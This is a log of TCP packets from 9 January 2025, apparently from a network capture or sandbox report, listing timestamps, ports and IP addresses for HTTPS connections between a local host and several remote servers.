Jan 9, 2025 14:56:16.442150116 CET	50028	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:16.442234993 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:16.442365885 CET	50028	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:16.442466021 CET	50028	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:16.442483902 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:16.508145094 CET	443	50031	108.139.47.33	192.168.2.10
Jan 9, 2025 14:56:16.508387089 CET	50031	443	192.168.2.10	108.139.47.33
Jan 9, 2025 14:56:16.508407116 CET	443	50031	108.139.47.33	192.168.2.10
Jan 9, 2025 14:56:16.509541988 CET	443	50031	108.139.47.33	192.168.2.10
Jan 9, 2025 14:56:16.510003090 CET	50031	443	192.168.2.10	108.139.47.33
Jan 9, 2025 14:56:16.510184050 CET	443	50031	108.139.47.33	192.168.2.10
Jan 9, 2025 14:56:16.510242939 CET	50031	443	192.168.2.10	108.139.47.33
Jan 9, 2025 14:56:16.551340103 CET	443	50031	108.139.47.33	192.168.2.10
Jan 9, 2025 14:56:16.627793074 CET	443	50031	108.139.47.33	192.168.2.10
Jan 9, 2025 14:56:16.627881050 CET	50031	443	192.168.2.10	108.139.47.33
Jan 9, 2025 14:56:16.638155937 CET	50031	443	192.168.2.10	108.139.47.33
Jan 9, 2025 14:56:16.638189077 CET	443	50031	108.139.47.33	192.168.2.10
Jan 9, 2025 14:56:16.647345066 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:16.647672892 CET	50028	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:16.665551901 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:16.665654898 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:16.665745020 CET	50028	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:16.683669090 CET	50028	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:16.683717012 CET	443	50028	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:16.953969002 CET	443	50037	20.110.205.119	192.168.2.10
Jan 9, 2025 14:56:16.979762077 CET	50037	443	192.168.2.10	20.110.205.119
Jan 9, 2025 14:56:16.979789019 CET	443	50037	20.110.205.119	192.168.2.10
Jan 9, 2025 14:56:16.981108904 CET	443	50037	20.110.205.119	192.168.2.10
Jan 9, 2025 14:56:16.982744932 CET	50037	443	192.168.2.10	20.110.205.119
Jan 9, 2025 14:56:16.982959032 CET	443	50037	20.110.205.119	192.168.2.10
Jan 9, 2025 14:56:16.987185955 CET	50037	443	192.168.2.10	20.110.205.119
Jan 9, 2025 14:56:17.027328968 CET	443	50037	20.110.205.119	192.168.2.10
Jan 9, 2025 14:56:17.038430929 CET	50017	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:17.038497925 CET	50018	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:17.038543940 CET	443	50017	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:17.038583040 CET	443	50018	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:17.038593054 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:17.038600922 CET	50017	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:17.038630962 CET	50018	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:17.038666010 CET	443	50021	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:17.038814068 CET	443	50021	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:17.038856983 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:17.038857937 CET	50021	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:17.038867950 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:17.038948059 CET	443	50022	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:17.039103985 CET	443	50022	172.64.41.3	192.168.2.10
Jan 9, 2025 14:56:17.039149046 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:17.039149046 CET	50022	443	192.168.2.10	172.64.41.3
Jan 9, 2025 14:56:17.040940046 CET	50019	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.041009903 CET	443	50019	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:17.041043043 CET	50020	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.041088104 CET	50019	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.041117907 CET	443	50020	162.159.61.3	192.168.2.10
Jan 9, 2025 14:56:17.041232109 CET	50020	443	192.168.2.10	162.159.61.3
Jan 9, 2025 14:56:17.150644064 CET	443	50037	20.110.205.119	192.168.2.10
Jan 9, 2025 14:56:17.150755882 CET	443	50037	20.110.205.119	192.168.2.10
Jan 9, 2025 14:56:17.150819063 CET	50037	443	192.168.2.10	20.110.205.119
Jan 9, 2025 14:56:17.152940035 CET	50037	443	192.168.2.10	20.110.205.119
Jan 9, 2025 14:56:17.152951956 CET	443	50037	20.110.205.119	192.168.2.10
Jan 9, 2025 14:56:17.847332954 CET	50053	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:17.847374916 CET	443	50053	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:17.847453117 CET	50053	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:17.847604990 CET	50054	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:17.847636938 CET	443	50054	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:17.847693920 CET	50054	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:17.847805977 CET	50053	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:17.847820044 CET	443	50053	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:17.848000050 CET	50054	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:17.848011017 CET	443	50054	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:17.848412037 CET	50055	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:17.848424911 CET	443	50055	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:17.848481894 CET	50055	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:17.848992109 CET	50055	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:17.849001884 CET	443	50055	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:17.850532055 CET	50056	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:17.850569010 CET	443	50056	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:17.850619078 CET	50056	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:17.850800037 CET	50056	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:17.850814104 CET	443	50056	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:17.867486954 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:17.867522955 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:17.867578983 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:17.867739916 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:17.867790937 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:17.868344069 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:17.869631052 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:17.869657040 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:17.869957924 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:17.869971991 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:17.957813978 CET	50059	443	192.168.2.10	23.219.82.16
Jan 9, 2025 14:56:17.957839966 CET	443	50059	23.219.82.16	192.168.2.10
Jan 9, 2025 14:56:17.957921028 CET	50059	443	192.168.2.10	23.219.82.16
Jan 9, 2025 14:56:17.958090067 CET	50059	443	192.168.2.10	23.219.82.16
Jan 9, 2025 14:56:17.958105087 CET	443	50059	23.219.82.16	192.168.2.10
Jan 9, 2025 14:56:18.304889917 CET	443	50054	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:18.306629896 CET	50054	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:18.306648016 CET	443	50054	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:18.307796001 CET	443	50054	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:18.307854891 CET	50054	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:18.320455074 CET	443	50053	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:18.366027117 CET	50053	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:18.366055012 CET	443	50053	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:18.366887093 CET	50054	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:18.367053032 CET	443	50054	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:18.367377043 CET	443	50053	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:18.367435932 CET	50053	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:18.368465900 CET	50053	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:18.368582964 CET	443	50053	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:18.431556940 CET	443	50059	23.219.82.16	192.168.2.10
Jan 9, 2025 14:56:18.432009935 CET	50059	443	192.168.2.10	23.219.82.16
Jan 9, 2025 14:56:18.432028055 CET	443	50059	23.219.82.16	192.168.2.10
Jan 9, 2025 14:56:18.433113098 CET	443	50059	23.219.82.16	192.168.2.10
Jan 9, 2025 14:56:18.433192968 CET	50059	443	192.168.2.10	23.219.82.16
Jan 9, 2025 14:56:18.434185982 CET	50059	443	192.168.2.10	23.219.82.16
Jan 9, 2025 14:56:18.434256077 CET	443	50059	23.219.82.16	192.168.2.10
Jan 9, 2025 14:56:18.436741114 CET	443	50056	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:18.436978102 CET	50056	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:18.437000990 CET	443	50056	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:18.438138008 CET	443	50056	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:18.438215971 CET	50056	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:18.439302921 CET	50056	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:18.439451933 CET	443	50056	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:18.439671993 CET	443	50055	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:18.439904928 CET	50055	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:18.439933062 CET	443	50055	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:18.441047907 CET	443	50055	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:18.441118002 CET	50055	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:18.441436052 CET	50055	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:18.441512108 CET	443	50055	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:18.456449032 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.456794024 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.456823111 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.457879066 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.457948923 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.458946943 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.459017038 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.459095001 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.459280014 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.459290981 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.459476948 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.459508896 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.459877968 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.460309029 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.460381031 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.460536003 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.460566044 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.562252045 CET	50054	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:18.562263966 CET	443	50054	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:18.562268972 CET	50053	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:18.562268972 CET	50055	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:18.562295914 CET	443	50053	23.219.82.80	192.168.2.10
Jan 9, 2025 14:56:18.562309980 CET	443	50055	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:18.573743105 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.573803902 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.573832989 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.573859930 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.573874950 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.573914051 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.573923111 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.577167988 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.577198982 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.577264071 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.577280998 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.577326059 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.578077078 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.578170061 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.578196049 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.578238964 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.582535982 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.582549095 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.582612038 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.582623959 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.583638906 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.583714008 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.583720922 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.583759069 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.639328957 CET	443	50059	23.219.82.16	192.168.2.10
Jan 9, 2025 14:56:18.639379025 CET	50059	443	192.168.2.10	23.219.82.16
Jan 9, 2025 14:56:18.647326946 CET	443	50056	204.79.197.219	192.168.2.10
Jan 9, 2025 14:56:18.647388935 CET	50056	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:18.662640095 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.662719011 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.662862062 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.662862062 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.662888050 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.663219929 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.663255930 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.663268089 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.663276911 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.663301945 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.663322926 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.663808107 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.663851976 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.663875103 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.663919926 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.664693117 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.664741993 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.664762974 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.664808989 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.667671919 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.667753935 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.667767048 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.668220997 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.668323994 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.668330908 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.668942928 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.669007063 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.669013977 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.670042992 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.670104027 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.670110941 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.670152903 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.670731068 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.670798063 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.670804024 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.710185051 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.710274935 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.710294008 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.710441113 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.752340078 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.752393007 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.752424955 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.752439022 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.752449989 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.752459049 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.752505064 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.752511024 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.752537966 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.752587080 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.753189087 CET	50054	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:18.753206968 CET	50053	443	192.168.2.10	23.219.82.80
Jan 9, 2025 14:56:18.753206968 CET	50055	443	192.168.2.10	204.79.197.219
Jan 9, 2025 14:56:18.757864952 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.758060932 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.758163929 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.758177042 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.758497000 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.758549929 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.758555889 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.759088993 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.759135008 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.759140968 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.759176016 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.759222031 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.759278059 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.759284019 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.759951115 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.760004044 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.760010004 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.760032892 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.760046005 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.760050058 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.760077953 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.761023998 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.761073112 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.761082888 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.761087894 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.761122942 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.761842966 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.761910915 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.761915922 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.762082100 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.762201071 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.762203932 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.762240887 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.778379917 CET	50057	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.778400898 CET	443	50057	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:18.782521009 CET	50058	443	192.168.2.10	131.253.33.203
Jan 9, 2025 14:56:18.782537937 CET	443	50058	131.253.33.203	192.168.2.10
Jan 9, 2025 14:56:19.232547998 CET	50067	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:19.232656956 CET	443	50067	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:19.232739925 CET	50067	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:19.232986927 CET	50067	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:19.233021021 CET	443	50067	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:19.260742903 CET	50068	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:19.260776043 CET	443	50068	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:19.261009932 CET	50068	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:19.301825047 CET	50068	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:19.301852942 CET	443	50068	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:19.924804926 CET	443	50067	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:19.944736958 CET	50067	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:19.944756985 CET	443	50067	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:19.945204973 CET	443	50067	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:19.976912975 CET	50067	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:19.977355003 CET	443	50067	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:19.977732897 CET	50067	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:19.977807999 CET	50067	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:19.977926970 CET	443	50067	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:19.992342949 CET	443	50068	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.004558086 CET	50068	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.004575968 CET	443	50068	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.005070925 CET	443	50068	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.011629105 CET	50068	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.011749983 CET	443	50068	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.012744904 CET	50068	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.012787104 CET	50068	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.012856007 CET	443	50068	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.088483095 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.088524103 CET	443	50071	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.088582039 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.089240074 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.089257956 CET	443	50071	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.134048939 CET	443	50067	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.134218931 CET	443	50067	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.134279013 CET	50067	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.149959087 CET	50067	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.149997950 CET	443	50067	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.293090105 CET	50073	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.293128967 CET	443	50073	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.293199062 CET	50073	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.293473959 CET	50073	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.293486118 CET	443	50073	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.294730902 CET	443	50068	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.294791937 CET	443	50068	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.294956923 CET	50068	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.295209885 CET	50068	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.295222998 CET	443	50068	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.803400993 CET	443	50071	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.803663969 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.803690910 CET	443	50071	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.804049015 CET	443	50071	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.804399014 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.804464102 CET	443	50071	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.804567099 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.804608107 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.804631948 CET	443	50071	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.977647066 CET	443	50071	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.977799892 CET	443	50071	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.977962017 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.978281975 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.978303909 CET	443	50071	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.978319883 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.980187893 CET	50071	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.989521027 CET	443	50073	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.990375042 CET	50073	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.990387917 CET	443	50073	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.990921021 CET	443	50073	52.182.143.215	192.168.2.10
Jan 9, 2025 14:56:20.991457939 CET	50073	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.991457939 CET	50073	443	192.168.2.10	52.182.143.215
Jan 9, 2025 14:56:20.991471052 CET	443	50073	52.182.143.215	192.168.2.10
